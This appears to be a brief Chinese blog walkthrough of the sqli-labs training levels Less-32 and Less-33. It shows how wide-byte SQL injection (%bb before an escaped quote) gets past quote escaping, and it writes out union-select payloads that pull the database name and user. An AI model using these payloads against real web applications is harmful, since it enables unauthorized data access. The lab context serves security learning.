Less32-Less-33

0x01 判断注入点

宽字节注入,过滤掉'(使用php函数将'转义)
输入',"都显示正常
判断宽字节注入

?id=1%bb%27

Less32-Less-33
或者

?id=1%bb%5c%5c%27--+

Less32-Less-33

0x02判断数据库名

后面就正常注入

?id=-1%bb%5c%5c%27 union select 1,database(),user()--+

Less32-Less-33

0x03 Less-33

33关同样的方法绕过

?id=1%bb%27--+

Less32-Less-33

?id=0%bb%5c%5c%27 union select 1,database(),user()--+

Less32-Less-33

上一篇:React Native知识5-Touchable类组件


下一篇:Python基础3 字符串类型 字符串类型的格式化